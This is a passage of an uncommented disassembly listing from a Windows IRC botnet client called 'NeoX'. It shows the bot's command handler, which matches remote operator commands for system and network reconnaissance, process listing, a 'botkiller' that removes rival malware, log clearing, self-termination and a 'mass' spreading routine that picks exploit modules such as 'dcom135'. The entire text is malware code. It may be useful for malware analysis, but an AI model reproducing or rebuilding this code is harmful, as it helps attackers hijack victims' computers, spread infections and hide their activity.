push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+s] ; int
call sub_40A03C
pop ecx
pop ecx
loc_40C7BD: ; CODE XREF: sub_40ABFE:loc_40C7AC�j
push 0FFFFFFFEh
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C7C5: ; CODE XREF: sub_40ABFE+1B54�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_status ; "irc.status"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C7FF
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_s ; "irc.s"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C855
loc_40C7FF: ; CODE XREF: sub_40ABFE+1BE2�j
push dword_4700D0
call sub_408A81
pop ecx
push eax
push offset dword_422698 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C855: ; CODE XREF: sub_40ABFE+1BFF�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_id ; "irc.id"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C88F
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_i ; "irc.i"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C8DD
loc_40C88F: ; CODE XREF: sub_40ABFE+1C72�j
push offset aNeox ; "NeoX"
push offset dword_4226E4 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C8DD: ; CODE XREF: sub_40ABFE+1C8F�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_rebewt ; "com.rebewt"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C962
call sub_408626
test eax, eax
jz short loc_40C90F
mov [ebp+Format], offset dword_422718
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C90F: ; CODE XREF: sub_40ABFE+1D03�j
mov [ebp+Format], offset dword_422744
loc_40C919: ; CODE XREF: sub_40ABFE+1D0F�j
push [ebp+Format] ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C962: ; CODE XREF: sub_40ABFE+1CFA�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aThreads_list ; "threads.list"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C9A0
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aThreads_l ; "threads.l"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40CAD8
loc_40C9A0: ; CODE XREF: sub_40ABFE+1D7F�j
push dword ptr [ebp+var_98] ; Format
push 80h ; Count
lea eax, [ebp+var_994]
push eax ; Dest
call __snprintf
add esp, 0Ch
mov eax, [ebp+s]
mov [ebp+Parameter], eax
mov eax, [ebp+var_85C]
mov [ebp+var_90C], eax
mov eax, [ebp+var_4]
mov [ebp+var_908], eax
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40CA0E
push offset aSub ; "sub"
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str1
call _strcmp
pop ecx
pop ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_192C], eax
jmp short loc_40CA15
; ---------------------------------------------------------------------------
loc_40CA0E: ; CODE XREF: sub_40ABFE+1DE8�j
and [ebp+var_192C], 0
loc_40CA15: ; CODE XREF: sub_40ABFE+1E0E�j
mov eax, [ebp+var_192C]
mov [ebp+var_910], eax
push offset dword_422798 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 0 ; int
push 20h ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_914], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+Parameter]
push eax ; lpParameter
push offset sub_4102E2 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_914]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_914]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40CAA8
loc_40CA93: ; CODE XREF: sub_40ABFE+1EA6�j
cmp [ebp+var_904], 0
jnz short loc_40CAA6
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40CA93
; ---------------------------------------------------------------------------
loc_40CAA6: ; CODE XREF: sub_40ABFE+1E9C�j
jmp short loc_40CAC3
; ---------------------------------------------------------------------------
loc_40CAA8: ; CODE XREF: sub_40ABFE+1E93�j
call ds:GetLastError
push eax
push offset dword_4227C4 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40CAC3: ; CODE XREF: sub_40ABFE:loc_40CAA6�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40CAD8: ; CODE XREF: sub_40ABFE+1D9C�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_aliases ; "irc.aliases"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40CB12
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_al ; "irc.al"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CB3C
loc_40CB12: ; CODE XREF: sub_40ABFE+1EF5�j
push [ebp+var_85C]
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40909D
add esp, 0Ch
push offset dword_422820
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40CB3C: ; CODE XREF: sub_40ABFE+1F12�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_log ; "irc.log"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40CB7A
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_lg ; "irc.lg"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40CCBC
loc_40CB7A: ; CODE XREF: sub_40ABFE+1F59�j
and [ebp+var_A28], 0
cmp [ebp+var_2D4], 0
jz short loc_40CBE2
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40CBE2
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_AB0], eax
cmp [ebp+var_AB0], 0
jz short loc_40CBE2
push [ebp+var_AB0]
push offset aS_1 ; "%s"
push 80h ; Count
lea eax, [ebp+var_A28]
push eax ; Dest
call __snprintf
add esp, 10h
loc_40CBE2: ; CODE XREF: sub_40ABFE+1F8A�j
; sub_40ABFE+1F9A�j ...
push dword ptr [ebp+var_98] ; Format
push 80h ; Count
lea eax, [ebp+var_AA8]
push eax ; Dest
call __snprintf
add esp, 0Ch
mov eax, [ebp+s]
mov [ebp+var_AAC], eax
mov eax, [ebp+var_85C]
mov [ebp+var_9A4], eax
mov eax, [ebp+var_4]
mov [ebp+var_9A0], eax
push offset dword_42285C ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 0 ; int
push 1Dh ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_9A8], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_AAC]
push eax ; lpParameter
push offset sub_4093A7 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_9A8]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_9A8]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40CCA1
loc_40CC8C: ; CODE XREF: sub_40ABFE+209F�j
cmp [ebp+var_99C], 0
jnz short loc_40CC9F
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40CC8C
; ---------------------------------------------------------------------------
loc_40CC9F: ; CODE XREF: sub_40ABFE+2095�j
jmp short loc_40CCB4
; ---------------------------------------------------------------------------
loc_40CCA1: ; CODE XREF: sub_40ABFE+208C�j
call ds:GetLastError
push eax ; char
push offset dword_422884 ; Format
call sub_4091D3
pop ecx
pop ecx
loc_40CCB4: ; CODE XREF: sub_40ABFE:loc_40CC9F�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40CCBC: ; CODE XREF: sub_40ABFE+1F76�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aUtil_clearlog ; "util.clearlog"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40CCF6
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aUtil_clg ; "util.clg"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD18
loc_40CCF6: ; CODE XREF: sub_40ABFE+20D9�j
push [ebp+var_4]
push [ebp+var_85C]
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_409303
add esp, 10h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40CD18: ; CODE XREF: sub_40ABFE+20F6�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_netinfo ; "com.netinfo"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40CD52
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_ni ; "com.ni"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD94
loc_40CD52: ; CODE XREF: sub_40ABFE+2135�j
push 0
push [ebp+var_85C]
push [ebp+s]
push [ebp+arg_1C]
lea eax, [ebp+Dst]
push eax
call sub_408EF7
add esp, 0Ch
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
push offset dword_4228FC
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40CD94: ; CODE XREF: sub_40ABFE+2152�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_sysinfo ; "com.sysinfo"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40CDCE
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_si ; "com.si"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE0C
loc_40CDCE: ; CODE XREF: sub_40ABFE+21B1�j
push 0
push [ebp+var_85C]
push [ebp+s]
lea eax, [ebp+Dst]
push eax
call sub_408C2B
pop ecx
pop ecx
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
push offset dword_422938
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40CE0C: ; CODE XREF: sub_40ABFE+21CE�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aFakju ; "fakju"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE69
cmp [ebp+var_4], 0
jnz short loc_40CE4D
push 0
push [ebp+var_85C]
push offset dword_422960
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40CE4D: ; CODE XREF: sub_40ABFE+222F�j
push [ebp+s]
call dword_4264B8 ; closesocket
call dword_42639C ; WSACleanup
call sub_408651
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_40CE69: ; CODE XREF: sub_40ABFE+2229�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_procs ; "com.procs"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40CEA7
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_ps ; "com.ps"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40D009
loc_40CEA7: ; CODE XREF: sub_40ABFE+2286�j
push 1Fh
call sub_4105E0
pop ecx
test eax, eax
jle short loc_40CEDC
cmp [ebp+var_4], 0
jnz short loc_40CED7
push 0
push [ebp+var_85C]
push offset a_n_z_m_Process ; ".n.z.m. (processes.p.l.g) .. Already"...
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40CED7: ; CODE XREF: sub_40ABFE+22B9�j
jmp loc_40D001
; ---------------------------------------------------------------------------
loc_40CEDC: ; CODE XREF: sub_40ABFE+22B3�j
push dword ptr [ebp+var_98] ; Format
push 80h ; Count
lea eax, [ebp+var_B44]
push eax ; Dest
call __snprintf
add esp, 0Ch
mov eax, [ebp+s]
mov [ebp+var_B48], eax
mov eax, [ebp+var_85C]
mov [ebp+var_ABC], eax
mov eax, [ebp+var_4]
mov [ebp+var_AB8], eax
and [ebp+var_AC0], 0
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40CF52
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str2
push offset aFull ; "full"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CF52
mov [ebp+var_AC0], 1
loc_40CF52: ; CODE XREF: sub_40ABFE+232B�j
; sub_40ABFE+2348�j
push offset a_n_z_m_Proce_0 ; ".n.z.m. (processes.p.l.g) .. Procces"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 0 ; int
push 1Fh ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_AC4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_B48]
push eax ; lpParameter
push offset sub_40F7C9 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_AC4]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_AC4]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40CFD9
loc_40CFC4: ; CODE XREF: sub_40ABFE+23D7�j
cmp [ebp+var_AB4], 0
jnz short loc_40CFD7
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40CFC4
; ---------------------------------------------------------------------------
loc_40CFD7: ; CODE XREF: sub_40ABFE+23CD�j
jmp short loc_40CFF4
; ---------------------------------------------------------------------------
loc_40CFD9: ; CODE XREF: sub_40ABFE+23C4�j
call ds:GetLastError
push eax
push offset a_n_z_m_Proce_1 ; ".n.z.m. (processes.p.l.g) .. Failed "...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40CFF4: ; CODE XREF: sub_40ABFE:loc_40CFD7�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40D001: ; CODE XREF: sub_40ABFE:loc_40CED7�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D009: ; CODE XREF: sub_40ABFE+22A3�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBk_on ; "bk.on"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D081
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBotkiller_on ; "botkiller.on"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D081
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBk_on_a ; "bk.on.a"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D081
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBotkiller_on_a ; "botkiller.on.a"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40D1FC
loc_40D081: ; CODE XREF: sub_40ABFE+2426�j
; sub_40ABFE+2443�j ...
push 21h
call sub_4105E0
pop ecx
test eax, eax
jle short loc_40D0B6
cmp [ebp+var_4], 0
jnz short loc_40D0B1
push 0
push [ebp+var_85C]
push offset a_n_z_m_Botki_0 ; ".n.z.m. (botkiller.p.l.g) .. Already"...
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40D0B1: ; CODE XREF: sub_40ABFE+2493�j
jmp loc_40D1F4
; ---------------------------------------------------------------------------
loc_40D0B6: ; CODE XREF: sub_40ABFE+248D�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBk_on_a_0 ; "bk.on.a"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D0F0
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBotkiller_on_0 ; "botkiller.on.a"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D0FC
loc_40D0F0: ; CODE XREF: sub_40ABFE+24D3�j
mov dword_421D2C, 1
jmp short loc_40D103
; ---------------------------------------------------------------------------
loc_40D0FC: ; CODE XREF: sub_40ABFE+24F0�j
and dword_421D2C, 0
loc_40D103: ; CODE XREF: sub_40ABFE+24FC�j
and dword_421D24, 0
mov eax, [ebp+s]
mov [ebp+var_B58], eax
mov eax, [ebp+var_85C]
mov [ebp+var_B50], eax
push offset a_n_z_m_Botki_1 ; ".n.z.m. (botkiller.p.l.g) .. Botkill"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 0 ; int
push 21h ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_B54], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_B58]
push eax ; lpParameter
push offset sub_405D52 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_B54]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_B54]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40D1A6
loc_40D191: ; CODE XREF: sub_40ABFE+25A4�j
cmp [ebp+var_B4C], 0
jnz short loc_40D1A4
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40D191
; ---------------------------------------------------------------------------
loc_40D1A4: ; CODE XREF: sub_40ABFE+259A�j
jmp short loc_40D1C1
; ---------------------------------------------------------------------------
loc_40D1A6: ; CODE XREF: sub_40ABFE+2591�j
call ds:GetLastError
push eax
push offset a_n_z_m_Botki_2 ; ".n.z.m. (botkiller.p.l.g) .. Failed "...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40D1C1: ; CODE XREF: sub_40ABFE:loc_40D1A4�j
cmp [ebp+var_4], 0
jnz short loc_40D1E7
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40D1E7: ; CODE XREF: sub_40ABFE+25C7�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40D1F4: ; CODE XREF: sub_40ABFE:loc_40D0B1�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D1FC: ; CODE XREF: sub_40ABFE+247D�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_uptime ; "com.uptime"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D23A
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_up ; "com.up"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40D2F1
loc_40D23A: ; CODE XREF: sub_40ABFE+2619�j
or [ebp+var_B5C], 0FFFFFFFFh
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_B60], eax
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40D27F
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _atoi
pop ecx
mov [ebp+var_B5C], eax
loc_40D27F: ; CODE XREF: sub_40ABFE+2666�j
mov eax, [ebp+var_B60]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, [ebp+var_B5C]
jnb short loc_40D29F
cmp [ebp+var_B5C], 0FFFFFFFFh
jnz short loc_40D2E9
loc_40D29F: ; CODE XREF: sub_40ABFE+2696�j
push 0
call sub_408A81
pop ecx
push eax
push offset dword_422B64 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40D2E9: ; CODE XREF: sub_40ABFE+269F�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D2F1: ; CODE XREF: sub_40ABFE+2636�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_who ; "irc.who"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40D3E0
cmp [ebp+var_4], 0
jnz short loc_40D336
push 0
push [ebp+var_85C]
push offset aLoginList ; "-[Login List]-"
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40D336: ; CODE XREF: sub_40ABFE+2718�j
and [ebp+var_5D8], 0
jmp short loc_40D34C
; ---------------------------------------------------------------------------
loc_40D33F: ; CODE XREF: sub_40ABFE+27CD�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40D34C: ; CODE XREF: sub_40ABFE+273F�j
cmp [ebp+var_5D8], 2
jge short loc_40D3D0
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
movsx eax, byte ptr [ecx+eax]
test eax, eax
jz short loc_40D381
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
lea eax, [ecx+eax+1]
mov [ebp+var_1930], eax
jmp short loc_40D38B
; ---------------------------------------------------------------------------
loc_40D381: ; CODE XREF: sub_40ABFE+2769�j
mov [ebp+var_1930], offset aEmpty ; "<Empty>"
loc_40D38B: ; CODE XREF: sub_40ABFE+2781�j
push [ebp+var_1930]
push [ebp+var_5D8]
push offset aD_S ; "%d. %s"
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
push 1
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
jmp loc_40D33F
; ---------------------------------------------------------------------------
loc_40D3D0: ; CODE XREF: sub_40ABFE+2755�j
push offset dword_422BB4
call sub_40913D
pop ecx
jmp loc_40EAE8
; ---------------------------------------------------------------------------
loc_40D3E0: ; CODE XREF: sub_40ABFE+270E�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCurrentip ; "currentip"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40D41A
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCip ; "cip"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D481
loc_40D41A: ; CODE XREF: sub_40ABFE+27FD�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40D445
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _atoi
pop ecx
mov [ebp+var_B64], eax
jmp short loc_40D453
; ---------------------------------------------------------------------------
loc_40D445: ; CODE XREF: sub_40ABFE+282A�j
push 8
call sub_410621
pop ecx
mov [ebp+var_B64], eax
loc_40D453: ; CODE XREF: sub_40ABFE+2845�j
cmp [ebp+var_B64], 0
jz short loc_40D479
push [ebp+var_B64]
push [ebp+var_85C]
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_404EAD
add esp, 10h
loc_40D479: ; CODE XREF: sub_40ABFE+285C�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40D481: ; CODE XREF: sub_40ABFE+281A�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aMass ; "mass"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40D95A
and [ebp+var_B68], 0
jmp short loc_40D4B8
; ---------------------------------------------------------------------------
loc_40D4AB: ; CODE XREF: sub_40ABFE+28CE�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_40D4B8: ; CODE XREF: sub_40ABFE+28AB�j
mov eax, [ebp+var_B68]
imul eax, 0Bh
movzx eax, byte_421C5A[eax]
test eax, eax
jz short loc_40D4CE
jmp short loc_40D4AB
; ---------------------------------------------------------------------------
loc_40D4CE: ; CODE XREF: sub_40ABFE+28CC�j
and [ebp+var_B6C], 0
jmp short loc_40D4E4
; ---------------------------------------------------------------------------
loc_40D4D7: ; CODE XREF: sub_40ABFE:loc_40D94D�j
mov eax, [ebp+var_B6C]
inc eax
mov [ebp+var_B6C], eax
loc_40D4E4: ; CODE XREF: sub_40ABFE+28D7�j
mov eax, [ebp+var_B6C]
imul eax, 0Bh
movzx eax, byte_421C5A[eax]
test eax, eax
jz loc_40D952
push 8
call sub_4105E0
pop ecx
mov [ebp+var_B70], eax
mov eax, 190h
cdq
idiv [ebp+var_B68]
mov ecx, [ebp+var_B70]
add ecx, eax
cmp ecx, 0C8h
jle short loc_40D565
push [ebp+var_B70]
push offset a_n_z_m_Root_p_ ; ".n.z.m. (root.p.l.g) .. Already %d s"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
jmp loc_40D94D
; ---------------------------------------------------------------------------
loc_40D565: ; CODE XREF: sub_40ABFE+2926�j
mov [ebp+var_B9C], 5Ah
mov [ebp+var_BB0], 5
cmp [ebp+var_BB0], 5
jnb short loc_40D58E
mov [ebp+var_1934], 5
jmp short loc_40D59A
; ---------------------------------------------------------------------------
loc_40D58E: ; CODE XREF: sub_40ABFE+2982�j
mov eax, [ebp+var_BB0]
mov [ebp+var_1934], eax
loc_40D59A: ; CODE XREF: sub_40ABFE+298E�j
mov eax, [ebp+var_1934]
mov [ebp+var_BB0], eax
cmp [ebp+var_BB0], 3Ch
jbe short loc_40D5BB
mov [ebp+var_1938], 3Ch
jmp short loc_40D5C7
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40ABFE+29AF�j
mov eax, [ebp+var_BB0]
mov [ebp+var_1938], eax
loc_40D5C7: ; CODE XREF: sub_40ABFE+29BB�j
mov eax, [ebp+var_1938]
mov [ebp+var_BB0], eax
and [ebp+var_BAC], 0
cmp [ebp+var_BAC], 320h
jbe short loc_40D5F2
mov [ebp+var_193C], 320h
jmp short loc_40D5FE
; ---------------------------------------------------------------------------
loc_40D5F2: ; CODE XREF: sub_40ABFE+29E6�j
mov eax, [ebp+var_BAC]
mov [ebp+var_193C], eax
loc_40D5FE: ; CODE XREF: sub_40ABFE+29F2�j
mov eax, [ebp+var_193C]
mov [ebp+var_BAC], eax
or [ebp+var_B98], 0FFFFFFFFh
and [ebp+var_B68], 0
jmp short loc_40D627
; ---------------------------------------------------------------------------
loc_40D61A: ; CODE XREF: sub_40ABFE:loc_40D685�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_40D627: ; CODE XREF: sub_40ABFE+2A1A�j
mov eax, [ebp+var_B68]
imul eax, 3Ch
cmp dword_41ED98[eax], 0
jz short loc_40D687
mov eax, [ebp+var_B6C]
imul eax, 0Bh
add eax, offset aDcom135_1 ; "dcom135"
push eax ; Str2
mov eax, [ebp+var_B68]
imul eax, 3Ch
add eax, offset aDcom135_0 ; "dcom135"
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D685
mov eax, [ebp+var_B68]
imul eax, 3Ch
mov eax, dword_41ED98[eax]
mov [ebp+var_BB4], eax
mov eax, [ebp+var_B68]
mov [ebp+var_B98], eax
jmp short loc_40D687
; ---------------------------------------------------------------------------
loc_40D685: ; CODE XREF: sub_40ABFE+2A62�j
jmp short loc_40D61A
; ---------------------------------------------------------------------------
